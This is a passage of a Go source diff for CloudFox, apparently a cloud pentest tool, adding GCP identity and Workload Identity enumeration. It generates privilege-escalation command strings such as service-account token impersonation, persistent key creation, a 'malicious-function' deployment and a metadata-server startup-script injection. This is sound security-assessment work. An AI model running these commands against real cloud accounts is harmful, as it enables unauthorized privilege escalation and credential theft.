ciService.Groups.Memberships.SearchDirectGroups("groups/-").Query(query).Do() + if err != nil { + m.CommandCounter.Error++ + parsedErr := gcpinternal.ParseGCPError(err, "cloudidentity.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, globals.GCP_WHOAMI_MODULE_NAME, + "Could not fetch group memberships") + // GroupsEnumerated stays false - use provided groups if available + m.useProvidedGroups(logger) + return + } + + // Successfully enumerated groups + m.Identity.GroupsEnumerated = true + + var enumeratedEmails []string + for _, membership := range resp.Memberships { + group := GroupMembership{ + GroupID: membership.Group, + DisplayName: membership.DisplayName, + Source: "enumerated", + } + if membership.GroupKey != nil { + group.Email = membership.GroupKey.Id + enumeratedEmails = append(enumeratedEmails, strings.ToLower(membership.GroupKey.Id)) + } + m.Identity.Groups = append(m.Identity.Groups, group) + } + + // Check for mismatch with provided groups + if len(m.ProvidedGroups) > 0 { + m.checkGroupMismatch(enumeratedEmails, logger) + } + + if len(m.Identity.Groups) > 0 { + logger.InfoM(fmt.Sprintf("Found %d group membership(s)", len(m.Identity.Groups)), globals.GCP_WHOAMI_MODULE_NAME) + } +} + +// useProvidedGroups adds provided groups when enumeration fails +func (m *WhoAmIModule) useProvidedGroups(logger internal.Logger) { + if len(m.ProvidedGroups) > 0 { + for _, groupEmail := range m.ProvidedGroups { + m.Identity.Groups = append(m.Identity.Groups, GroupMembership{ + Email: groupEmail, + Source: "provided", + }) + } + logger.InfoM(fmt.Sprintf("Using %d provided group(s) (enumeration failed)", len(m.ProvidedGroups)), globals.GCP_WHOAMI_MODULE_NAME) + } +} + +// checkGroupMismatch compares provided groups with enumerated groups +func (m *WhoAmIModule) checkGroupMismatch(enumeratedEmails []string, logger internal.Logger) { + enumeratedSet := make(map[string]bool) + for _, email := range enumeratedEmails { + enumeratedSet[strings.ToLower(email)] = true + } + + providedSet := make(map[string]bool) + for _, email := range m.ProvidedGroups { + providedSet[strings.ToLower(email)] = true + } + + // Check for provided groups not in enumerated + var notInEnumerated []string + for _, email := range m.ProvidedGroups { + if !enumeratedSet[strings.ToLower(email)] { + notInEnumerated = append(notInEnumerated, email) + } + } + + // Check for enumerated groups not in provided + var notInProvided []string + for _, email := range enumeratedEmails { + if !providedSet[strings.ToLower(email)] { + notInProvided = append(notInProvided, email) + } + } + + if len(notInEnumerated) > 0 || len(notInProvided) > 0 { + m.Identity.GroupsMismatch = true + if len(notInEnumerated) > 0 { + logger.InfoM(fmt.Sprintf("[WARNING] Provided groups not found in enumerated: %s", strings.Join(notInEnumerated, ", ")), globals.GCP_WHOAMI_MODULE_NAME) + } + if len(notInProvided) > 0 { + logger.InfoM(fmt.Sprintf("[WARNING] Enumerated groups not in provided list: %s", strings.Join(notInProvided, ", ")), globals.GCP_WHOAMI_MODULE_NAME) + } + } +} + +// getRoleBindings retrieves IAM role bindings for the current identity +func (m *WhoAmIModule) getRoleBindings(ctx context.Context, logger internal.Logger) { + iamService := IAMService.New() + + // Determine the member format for current identity + var memberPrefix string + if m.Identity.Type == "serviceAccount" { + memberPrefix = "serviceAccount:" + } else { + memberPrefix = "user:" + } + fullMember := memberPrefix + m.Identity.Email + + // Build list of group members to check + groupMembers := make(map[string]string) // group:email -> email for display + for _, group := range m.Identity.Groups { + if group.Email != "" { + groupMembers["group:"+group.Email] = group.Email + } + } + + // Get role bindings from each project + for _, projectID := range m.ProjectIDs { + // Use PrincipalsWithRolesEnhanced which includes inheritance + principals, err := iamService.PrincipalsWithRolesEnhanced(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_WHOAMI_MODULE_NAME, + fmt.Sprintf("Could not get IAM bindings for project %s", projectID)) + continue + } + + // Find bindings for the current identity (direct) + for _, principal := range principals { + if principal.Name == fullMember || principal.Email == m.Identity.Email { + for _, binding := range principal.PolicyBindings { + rb := RoleBinding{ + Role: binding.Role, + Scope: binding.ResourceType, + ScopeID: binding.ResourceID, + Inherited: binding.IsInherited, + InheritedFrom: "direct", + MemberType: m.Identity.Type, + } + if binding.HasCondition && binding.ConditionInfo != nil { + rb.Condition = binding.ConditionInfo.Title + } + // Set inherited source if from parent resource + if binding.IsInherited && binding.InheritedFrom != "" { + rb.InheritedFrom = binding.InheritedFrom + } + + // Check for dangerous permissions + if isDangerousRole(binding.Role) { + m.DangerousPermissions = append(m.DangerousPermissions, fmt.Sprintf("%s on %s", binding.Role, binding.ResourceID)) + } + + m.mu.Lock() + m.RoleBindings = append(m.RoleBindings, rb) + m.mu.Unlock() + } + } + + // Check for group-based bindings + if groupEmail, ok := groupMembers[principal.Name]; ok { + for _, binding := range principal.PolicyBindings { + rb := RoleBinding{ + Role: binding.Role, + Scope: binding.ResourceType, + ScopeID: binding.ResourceID, + Inherited: binding.IsInherited, + InheritedFrom: fmt.Sprintf("group:%s", groupEmail), + MemberType: "group", + } + if binding.HasCondition && binding.ConditionInfo != nil { + rb.Condition = binding.ConditionInfo.Title + } + + // Check for dangerous permissions + if isDangerousRole(binding.Role) { + m.DangerousPermissions = append(m.DangerousPermissions, fmt.Sprintf("%s on %s (via group %s)", binding.Role, binding.ResourceID, groupEmail)) + } + + m.mu.Lock() + m.RoleBindings = append(m.RoleBindings, rb) + m.mu.Unlock() + } + } + } + } + + directCount := 0 + groupCount := 0 + for _, rb := range m.RoleBindings { + if rb.MemberType == "group" { + groupCount++ + } else { + directCount++ + } + } + + if groupCount > 0 { + logger.InfoM(fmt.Sprintf("Found %d role binding(s) (%d direct, %d via groups)", len(m.RoleBindings), directCount, groupCount), globals.GCP_WHOAMI_MODULE_NAME) + } else { + logger.InfoM(fmt.Sprintf("Found %d role binding(s) for current identity", len(m.RoleBindings)), globals.GCP_WHOAMI_MODULE_NAME) + } +} + +// findImpersonationTargets identifies service accounts that can be impersonated +func (m *WhoAmIModule) findImpersonationTargets(ctx context.Context, logger internal.Logger) { + iamService := IAMService.New() + + // Determine the member format for current identity + var memberPrefix string + if m.Identity.Type == "serviceAccount" { + memberPrefix = "serviceAccount:" + } else { + memberPrefix = "user:" + } + fullMember := memberPrefix + m.Identity.Email + + for _, projectID := range m.ProjectIDs { + // Get all service accounts in the project + serviceAccounts, err := iamService.ServiceAccounts(projectID) + if err != nil { + continue + } + + for _, sa := range serviceAccounts { + // Check if current identity can impersonate this SA using GetServiceAccountIAMPolicy + impersonationInfo, err := iamService.GetServiceAccountIAMPolicy(ctx, sa.Email, projectID) + if err != nil { + continue + } + + // Check if current identity is in the token creators or key creators list + canImpersonate := false + canCreateKeys := false + canActAs := false + + for _, tc := range impersonationInfo.TokenCreators { + if tc == fullMember || tc == m.Identity.Email || tc == "allUsers" || tc == "allAuthenticatedUsers" { + canImpersonate = true + break + } + } + + for _, kc := range impersonationInfo.KeyCreators { + if kc == fullMember || kc == m.Identity.Email || kc == "allUsers" || kc == "allAuthenticatedUsers" { + canCreateKeys = true + break + } + } + + for _, aa := range impersonationInfo.ActAsUsers { + if aa == fullMember || aa == m.Identity.Email || aa == "allUsers" || aa == "allAuthenticatedUsers" { + canActAs = true + break + } + } + + if canImpersonate || canCreateKeys || canActAs { + target := ImpersonationTarget{ + ServiceAccount: sa.Email, + ProjectID: projectID, + CanImpersonate: canImpersonate, + CanCreateKeys: canCreateKeys, + CanActAs: canActAs, + } + m.ImpersonationTargets = append(m.ImpersonationTargets, target) + } + } + } + + if len(m.ImpersonationTargets) > 0 { + logger.InfoM(fmt.Sprintf("[PENTEST] Found %d service account(s) that can be impersonated", len(m.ImpersonationTargets)), globals.GCP_WHOAMI_MODULE_NAME) + } +} + +// identifyPrivEscPaths identifies privilege escalation paths based on current permissions +func (m *WhoAmIModule) identifyPrivEscPaths(ctx context.Context, logger internal.Logger) { + // Check for privilege escalation opportunities based on role bindings + for _, rb := range m.RoleBindings { + paths := getPrivEscPathsForRole(rb.Role, rb.ScopeID) + m.PrivEscPaths = append(m.PrivEscPaths, paths...) + } + + // Check impersonation-based privilege escalation + for _, target := range m.ImpersonationTargets { + if target.CanImpersonate { + path := PrivilegeEscalationPath{ + Name: fmt.Sprintf("Impersonate %s", target.ServiceAccount), + Description: "Can generate access tokens for this service account", + Risk: "HIGH", + Command: fmt.Sprintf("gcloud auth print-access-token --impersonate-service-account=%s", target.ServiceAccount), + } + m.PrivEscPaths = append(m.PrivEscPaths, path) + } + + if target.CanCreateKeys { + path := PrivilegeEscalationPath{ + Name: fmt.Sprintf("Create key for %s", target.ServiceAccount), + Description: "Can create persistent service account keys", + Risk: "CRITICAL", + Command: fmt.Sprintf("gcloud iam service-accounts keys create key.json --iam-account=%s", target.ServiceAccount), + } + m.PrivEscPaths = append(m.PrivEscPaths, path) + } + } + + if len(m.PrivEscPaths) > 0 { + logger.InfoM(fmt.Sprintf("[PRIVESC] Found %d privilege escalation path(s)", len(m.PrivEscPaths)), globals.GCP_WHOAMI_MODULE_NAME) + } +} + +// isDangerousRole checks if a role is considered dangerous +func isDangerousRole(role string) bool { + dangerousRoles := []string{ + "roles/owner", + "roles/editor", + "roles/iam.securityAdmin", + "roles/iam.serviceAccountAdmin", + "roles/iam.serviceAccountKeyAdmin", + "roles/iam.serviceAccountTokenCreator", + "roles/resourcemanager.organizationAdmin", + "roles/resourcemanager.folderAdmin", + "roles/resourcemanager.projectIamAdmin", + "roles/cloudfunctions.admin", + "roles/compute.admin", + "roles/container.admin", + "roles/storage.admin", + } + + for _, dr := range dangerousRoles { + if role == dr { + return true + } + } + return false +} + +// getPrivEscPathsForRole returns privilege escalation paths for a given role +func getPrivEscPathsForRole(role, projectID string) []PrivilegeEscalationPath { + var paths []PrivilegeEscalationPath + + switch role { + case "roles/iam.serviceAccountTokenCreator": + paths = append(paths, PrivilegeEscalationPath{ + Name: "Token Creator - Impersonate any SA", + Description: "Can generate access tokens for any service account in the project", + Risk: "CRITICAL", + Command: fmt.Sprintf("gcloud iam service-accounts list --project=%s", projectID), + }) + case "roles/iam.serviceAccountKeyAdmin": + paths = append(paths, PrivilegeEscalationPath{ + Name: "Key Admin - Create persistent keys", + Description: "Can create service account keys for any SA", + Risk: "CRITICAL", + Command: fmt.Sprintf("gcloud iam service-accounts list --project=%s", projectID), + }) + case "roles/cloudfunctions.admin": + paths = append(paths, PrivilegeEscalationPath{ + Name: "Cloud Functions Admin - Code Execution", + Description: "Can deploy Cloud Functions with SA permissions", + Risk: "HIGH", + Command: "gcloud functions deploy malicious-function --runtime=python39 --trigger-http --service-account=", + }) + case "roles/compute.admin": + paths = append(paths, PrivilegeEscalationPath{ + Name: "Compute Admin - Metadata Injection", + Description: "Can add startup scripts with SA access", + Risk: "HIGH", + Command: "gcloud compute instances add-metadata --metadata=startup-script='curl -H \"Metadata-Flavor: Google\" http://metadata/...'", + }) + case "roles/container.admin": + paths = append(paths, PrivilegeEscalationPath{ + Name: "Container Admin - Pod Deployment", + Description: "Can deploy pods with service account access", + Risk: "HIGH", + Command: fmt.Sprintf("gcloud container clusters get-credentials --project=%s", projectID), + }) + case "roles/owner", "roles/editor": + paths = append(paths, PrivilegeEscalationPath{ + Name: "Owner/Editor - Full Project Access", + Description: "Has full control over project resources", + Risk: "CRITICAL", + Command: fmt.Sprintf("gcloud projects get-iam-policy %s", projectID), + }) + } + + return paths +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *WhoAmIModule) initializeLootFiles() { + // Note: whoami-context and whoami-permissions loot files removed as redundant + // The same information is already saved to table/csv/json files + + // Extended mode loot files - these contain actionable commands + if m.Extended { + m.LootMap["whoami-impersonation"] = &internal.LootFile{ + Name: "whoami-impersonation", + Contents: "# Service Account Impersonation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization!\n\n", + } + m.LootMap["whoami-privesc"] = &internal.LootFile{ + Name: "whoami-privesc", + Contents: "# Privilege Escalation Paths\n# Generated by CloudFox\n# WARNING: Only use with proper authorization!\n\n", + } + } +} + +func (m *WhoAmIModule) generateLoot() { + // Note: Context and permissions info is already saved to table/csv/json files + // Only generate loot files for extended mode (actionable commands) + + // Extended mode loot + if m.Extended { + // Impersonation loot + for _, target := range m.ImpersonationTargets { + m.LootMap["whoami-impersonation"].Contents += fmt.Sprintf( + "# Service Account: %s\n"+ + "# Project: %s\n", + target.ServiceAccount, + target.ProjectID, + ) + if target.CanImpersonate { + m.LootMap["whoami-impersonation"].Contents += fmt.Sprintf( + "gcloud auth print-access-token --impersonate-service-account=%s\n", + target.ServiceAccount, + ) + } + if target.CanCreateKeys { + m.LootMap["whoami-impersonation"].Contents += fmt.Sprintf( + "gcloud iam service-accounts keys create key.json --iam-account=%s\n", + target.ServiceAccount, + ) + } + m.LootMap["whoami-impersonation"].Contents += "\n" + } + + // Privilege escalation loot + for _, path := range m.PrivEscPaths { + m.LootMap["whoami-privesc"].Contents += fmt.Sprintf( + "## %s [%s]\n"+ + "# %s\n"+ + "%s\n\n", + path.Name, + path.Risk, + path.Description, + path.Command, + ) + } + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *WhoAmIModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Identity table + identityHeader := []string{ + "Property", + "Value", + } + + identityBody := [][]string{ + {"Email", m.Identity.Email}, + {"Type", m.Identity.Type}, + } + + // Add project details (expanded) + for i, proj := range m.Identity.Projects { + label := "Project" + if len(m.Identity.Projects) > 1 { + label = fmt.Sprintf("Project %d", i+1) + } + if proj.DisplayName != "" { + identityBody = append(identityBody, []string{label, fmt.Sprintf("%s (%s)", proj.DisplayName, proj.ProjectID)}) + } else { + identityBody = append(identityBody, []string{label, proj.ProjectID}) + } + } + if len(m.Identity.Projects) == 0 { + identityBody = append(identityBody, []string{"Projects", "0"}) + } + + // Add organization details (expanded) + for i, org := range m.Identity.Organizations { + label := "Organization" + if len(m.Identity.Organizations) > 1 { + label = fmt.Sprintf("Organization %d", i+1) + } + if org.DisplayName != "" { + identityBody = append(identityBody, []string{label, fmt.Sprintf("%s (%s)", org.DisplayName, org.OrgID)}) + } else { + identityBody = append(identityBody, []string{label, org.OrgID}) + } + } + if len(m.Identity.Organizations) == 0 { + identityBody = append(identityBody, []string{"Organizations", "0"}) + } + + // Add folder details (expanded) + for i, folder := range m.Identity.Folders { + label := "Folder" + if len(m.Identity.Folders) > 1 { + label = fmt.Sprintf("Folder %d", i+1) + } + folderID := strings.TrimPrefix(folder.Name, "folders/") + if folder.DisplayName != "" { + identityBody = append(identityBody, []string{label, fmt.Sprintf("%s (%s)", folder.DisplayName, folderID)}) + } else { + identityBody = append(identityBody, []string{label, folderID}) + } + } + if len(m.Identity.Folders) == 0 { + identityBody = append(identityBody, []string{"Folders", "0"}) + } + + // Add group membership details (expanded) + for i, group := range m.Identity.Groups { + label := "Group" + if len(m.Identity.Groups) > 1 { + label = fmt.Sprintf("Group %d", i+1) + } + + // Build display value with source indicator + var displayValue string + if group.DisplayName != "" && group.Email != "" { + displayValue = fmt.Sprintf("%s (%s)", group.DisplayName, group.Email) + } else if group.Email != "" { + displayValue = group.Email + } else if group.DisplayName != "" { + displayValue = group.DisplayName + } else { + displayValue = group.GroupID + } + + // Add source indicator + if group.Source == "provided" { + displayValue += " (provided)" + } else if group.Source == "enumerated" && m.Identity.GroupsMismatch { + displayValue += " (enumerated)" + } + + identityBody = append(identityBody, []string{label, displayValue}) + } + if len(m.Identity.Groups) == 0 { + if m.Identity.GroupsEnumerated { + identityBody = append(identityBody, []string{"Groups", "0"}) + } else { + identityBody = append(identityBody, []string{"Groups", "Unknown (permission denied)"}) + } + } + + // Add role binding details (expanded) + for i, rb := range m.RoleBindings { + label := "Role Binding" + if len(m.RoleBindings) > 1 { + label = fmt.Sprintf("Role Binding %d", i+1) + } + // Format: Role -> Scope (ScopeID) + scopeDisplay := rb.ScopeID + if rb.ScopeName != "" { + scopeDisplay = fmt.Sprintf("%s (%s)", rb.ScopeName, rb.ScopeID) + } + + // Build source/inheritance info + sourceStr := "" + if rb.InheritedFrom != "" && rb.InheritedFrom != "direct" { + if strings.HasPrefix(rb.InheritedFrom, "group:") { + // Group-based binding + sourceStr = fmt.Sprintf(" [via %s]", rb.InheritedFrom) + } else { + // Inherited from parent resource (folder/org) + sourceStr = fmt.Sprintf(" [inherited from %s]", rb.InheritedFrom) + } + } else if rb.InheritedFrom == "direct" { + sourceStr = " [direct]" + } + + identityBody = append(identityBody, []string{label, fmt.Sprintf("%s on %s/%s%s", rb.Role, rb.Scope, scopeDisplay, sourceStr)}) + } + if len(m.RoleBindings) == 0 { + identityBody = append(identityBody, []string{"Role Bindings", "0"}) + } + + // Add extended info to identity table + if m.Extended { + identityBody = append(identityBody, []string{"Impersonation Targets", fmt.Sprintf("%d", len(m.ImpersonationTargets))}) + identityBody = append(identityBody, []string{"Privilege Escalation Paths", fmt.Sprintf("%d", len(m.PrivEscPaths))}) + } + + // Role bindings table + rolesHeader := []string{ + "Role", + "Scope", + "Scope ID", + "Source", + } + + var rolesBody [][]string + for _, rb := range m.RoleBindings { + source := rb.InheritedFrom + if source == "" { + source = "direct" + } + rolesBody = append(rolesBody, []string{ + rb.Role, + rb.Scope, + rb.ScopeID, + source, + }) + } + + // Build tables + tables := []internal.TableFile{ + { + Name: "whoami-identity", + Header: identityHeader, + Body: identityBody, + }, + } + + if len(rolesBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "whoami-roles", + Header: rolesHeader, + Body: rolesBody, + }) + } + + // Extended mode tables + if m.Extended { + // Impersonation targets table + if len(m.ImpersonationTargets) > 0 { + impersonationHeader := []string{ + "Service Account", + "Project", + "Can Impersonate", + "Can Create Keys", + "Can ActAs", + } + + var impersonationBody [][]string + for _, target := range m.ImpersonationTargets { + impersonationBody = append(impersonationBody, []string{ + target.ServiceAccount, + target.ProjectID, + whoamiBoolToYesNo(target.CanImpersonate), + whoamiBoolToYesNo(target.CanCreateKeys), + whoamiBoolToYesNo(target.CanActAs), + }) + } + + tables = append(tables, internal.TableFile{ + Name: "whoami-impersonation", + Header: impersonationHeader, + Body: impersonationBody, + }) + } + + // Privilege escalation table + if len(m.PrivEscPaths) > 0 { + privescHeader := []string{ + "Path Name", + "Risk", + "Description", + "Command", + } + + var privescBody [][]string + for _, path := range m.PrivEscPaths { + privescBody = append(privescBody, []string{ + path.Name, + path.Risk, + path.Description, + path.Command, + }) + } + + tables = append(tables, internal.TableFile{ + Name: "whoami-privesc", + Header: privescHeader, + Body: privescBody, + }) + } + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + output := WhoAmIOutput{ + Table: tables, + Loot: lootFiles, + } + + // Write output + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + m.ProjectIDs, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_WHOAMI_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// whoamiBoolToYesNo converts a boolean to "Yes" or "No" +func whoamiBoolToYesNo(b bool) string { + if b { + return "Yes" + } + return "No" } diff --git a/gcp/commands/workloadidentity.go b/gcp/commands/workloadidentity.go new file mode 100644 index 00000000..7f5a3c73 --- /dev/null +++ b/gcp/commands/workloadidentity.go @@ -0,0 +1,806 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + gkeservice "github.com/BishopFox/cloudfox/gcp/services/gkeService" + IAMService "github.com/BishopFox/cloudfox/gcp/services/iamService" + workloadidentityservice "github.com/BishopFox/cloudfox/gcp/services/workloadIdentityService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPWorkloadIdentityCommand = &cobra.Command{ + Use: globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME, + Aliases: []string{"wi", "gke-identity", "workload-id"}, + Short: "Enumerate GKE Workload Identity and Workload Identity Federation", + Long: `Enumerate Workload Identity configurations including GKE bindings and external identity federation. + +Features: +- Lists GKE clusters with Workload Identity enabled +- Shows Kubernetes service accounts bound to GCP service accounts +- Identifies privilege escalation paths through Workload Identity +- Maps namespace/service account to GCP permissions +- Detects overly permissive bindings + +Workload Identity Federation (External Identities): +- Lists Workload Identity Pools and Providers +- Analyzes AWS, OIDC (GitHub Actions, GitLab CI), and SAML providers +- Identifies risky provider configurations (missing attribute conditions) +- Shows federated identity bindings to GCP service accounts +- Generates exploitation commands for pentesting`, + Run: runGCPWorkloadIdentityCommand, +} + +// WorkloadIdentityBinding represents a binding between K8s SA and GCP SA +type WorkloadIdentityBinding struct { + ProjectID string `json:"projectId"` + ClusterName string `json:"clusterName"` + ClusterLocation string `json:"clusterLocation"` + WorkloadPool string `json:"workloadPool"` + KubernetesNS string `json:"kubernetesNamespace"` + KubernetesSA string `json:"kubernetesServiceAccount"` + GCPServiceAccount string `json:"gcpServiceAccount"` + GCPSARoles []string `json:"gcpServiceAccountRoles"` + IsHighPrivilege bool `json:"isHighPrivilege"` + BindingType string `json:"bindingType"` // "workloadIdentityUser" or "other" +} + +// ClusterWorkloadIdentity represents a cluster's workload identity configuration +type ClusterWorkloadIdentity struct { + ProjectID string `json:"projectId"` + ClusterName string `json:"clusterName"` + Location string `json:"location"` + WorkloadPoolEnabled bool `json:"workloadPoolEnabled"` + WorkloadPool string `json:"workloadPool"` + NodePoolsWithWI int `json:"nodePoolsWithWI"` + TotalNodePools int `json:"totalNodePools"` +} + +// ------------------------------ +// Module Struct with embedded BaseGCPModule +// ------------------------------ +type WorkloadIdentityModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields (GKE Workload Identity) + Clusters []ClusterWorkloadIdentity + Bindings []WorkloadIdentityBinding + + // Workload Identity Federation fields + Pools []workloadidentityservice.WorkloadIdentityPool + Providers []workloadidentityservice.WorkloadIdentityProvider + FederatedBindings []workloadidentityservice.FederatedIdentityBinding + + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct implementing CloudfoxOutput interface +// ------------------------------ +type WorkloadIdentityOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o WorkloadIdentityOutput) TableFiles() []internal.TableFile { return o.Table } +func (o WorkloadIdentityOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPWorkloadIdentityCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) + if err != nil { + return // Error already logged + } + + // Create module instance + module := &WorkloadIdentityModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Clusters: []ClusterWorkloadIdentity{}, + Bindings: []WorkloadIdentityBinding{}, + Pools: []workloadidentityservice.WorkloadIdentityPool{}, + Providers: []workloadidentityservice.WorkloadIdentityProvider{}, + FederatedBindings: []workloadidentityservice.FederatedIdentityBinding{}, + LootMap: make(map[string]*internal.LootFile), + } + + // Initialize loot files + module.initializeLootFiles() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *WorkloadIdentityModule) Execute(ctx context.Context, logger internal.Logger) { + // Run enumeration with concurrency + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME, m.processProject) + + // Check if we have any findings + hasGKE := len(m.Clusters) > 0 + hasFederation := len(m.Pools) > 0 + + if !hasGKE && !hasFederation { + logger.InfoM("No Workload Identity configurations found", globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) + return + } + + // Count GKE clusters with Workload Identity + if hasGKE { + wiEnabled := 0 + for _, c := range m.Clusters { + if c.WorkloadPoolEnabled { + wiEnabled++ + } + } + logger.SuccessM(fmt.Sprintf("Found %d GKE cluster(s) (%d with Workload Identity), %d K8s->GCP binding(s)", + len(m.Clusters), wiEnabled, len(m.Bindings)), globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) + } + + // Count federation findings + if hasFederation { + logger.SuccessM(fmt.Sprintf("Found %d Workload Identity Pool(s), %d Provider(s), %d federated binding(s)", + len(m.Pools), len(m.Providers), len(m.FederatedBindings)), globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) + } + + // Write output + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor (called concurrently for each project) +// ------------------------------ +func (m *WorkloadIdentityModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Workload Identity in project: %s", projectID), globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) + } + + // ========================================== + // Part 1: GKE Workload Identity + // ========================================== + gkeSvc := gkeservice.New() + clusters, _, err := gkeSvc.Clusters(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME, + fmt.Sprintf("Could not enumerate GKE clusters in project %s", projectID)) + } + + var clusterInfos []ClusterWorkloadIdentity + var bindings []WorkloadIdentityBinding + + for _, cluster := range clusters { + // Analyze cluster Workload Identity configuration + cwi := ClusterWorkloadIdentity{ + ProjectID: projectID, + ClusterName: cluster.Name, + Location: cluster.Location, + TotalNodePools: cluster.NodePoolCount, + } + + // Check if Workload Identity is enabled at cluster level + if cluster.WorkloadIdentity != "" { + cwi.WorkloadPoolEnabled = true + cwi.WorkloadPool = cluster.WorkloadIdentity + } + + // Node pools with WI is not tracked individually in ClusterInfo + // Just mark all as WI-enabled if cluster has WI + if cwi.WorkloadPoolEnabled { + cwi.NodePoolsWithWI = cwi.TotalNodePools + } + + clusterInfos = append(clusterInfos, cwi) + + // If Workload Identity is enabled, look for bindings + if cwi.WorkloadPoolEnabled { + clusterBindings := m.findWorkloadIdentityBindings(ctx, projectID, cluster.Name, cluster.Location, cwi.WorkloadPool, logger) + bindings = append(bindings, clusterBindings...) + } + } + + // ========================================== + // Part 2: Workload Identity Federation + // ========================================== + wiSvc := workloadidentityservice.New() + + // Get Workload Identity Pools + pools, err := wiSvc.ListWorkloadIdentityPools(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME, + fmt.Sprintf("Could not list Workload Identity Pools in project %s", projectID)) + } + + var providers []workloadidentityservice.WorkloadIdentityProvider + + // Get providers for each pool + for _, pool := range pools { + poolProviders, err := wiSvc.ListWorkloadIdentityProviders(projectID, pool.PoolID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME, + fmt.Sprintf("Could not list providers for pool %s", pool.PoolID)) + continue + } + providers = append(providers, poolProviders...) + } + + // Find federated identity bindings + fedBindings, err := wiSvc.FindFederatedIdentityBindings(projectID, pools) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME, + fmt.Sprintf("Could not find federated identity bindings in project %s", projectID)) + } + + // Thread-safe append + m.mu.Lock() + m.Clusters = append(m.Clusters, clusterInfos...) + m.Bindings = append(m.Bindings, bindings...) + m.Pools = append(m.Pools, pools...) + m.Providers = append(m.Providers, providers...) + m.FederatedBindings = append(m.FederatedBindings, fedBindings...) + + // Generate loot + for _, cwi := range clusterInfos { + m.addClusterToLoot(cwi) + } + for _, binding := range bindings { + m.addBindingToLoot(binding) + } + for _, pool := range pools { + m.addPoolToLoot(pool) + } + for _, provider := range providers { + m.addProviderToLoot(provider) + } + for _, fedBinding := range fedBindings { + m.addFederatedBindingToLoot(fedBinding) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d GKE cluster(s), %d K8s binding(s), %d pool(s), %d provider(s) in project %s", + len(clusterInfos), len(bindings), len(pools), len(providers), projectID), globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) + } +} + +// findWorkloadIdentityBindings finds all IAM bindings that grant workloadIdentityUser role +func (m *WorkloadIdentityModule) findWorkloadIdentityBindings(ctx context.Context, projectID, clusterName, location, workloadPool string, logger internal.Logger) []WorkloadIdentityBinding { + var bindings []WorkloadIdentityBinding + + // Get all service accounts in the project and check their IAM policies + iamSvc := IAMService.New() + serviceAccounts, err := iamSvc.ServiceAccounts(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME, + fmt.Sprintf("Could not list service accounts in project %s", projectID)) + return bindings + } + + // For each service account, get its IAM policy and look for workloadIdentityUser bindings + for _, sa := range serviceAccounts { + // Get IAM policy for this service account + // The workloadIdentityUser role is granted ON the service account + saPolicy, err := m.getServiceAccountPolicy(ctx, sa.Name) + if err != nil { + continue + } + + // Look for members with workloadIdentityUser role + for _, binding := range saPolicy { + if binding.Role == "roles/iam.workloadIdentityUser" { + for _, member := range binding.Members { + // Parse member to extract namespace and KSA + // Format: serviceAccount:[PROJECT_ID].svc.id.goog[NAMESPACE/KSA_NAME] + if strings.HasPrefix(member, "serviceAccount:") && strings.Contains(member, ".svc.id.goog") { + ns, ksa := parseWorkloadIdentityMember(member) + if ns != "" && ksa != "" { + wib := WorkloadIdentityBinding{ + ProjectID: projectID, + ClusterName: clusterName, + ClusterLocation: location, + WorkloadPool: workloadPool, + KubernetesNS: ns, + KubernetesSA: ksa, + GCPServiceAccount: sa.Email, + GCPSARoles: sa.Roles, + BindingType: "workloadIdentityUser", + } + + // Check if high privilege + 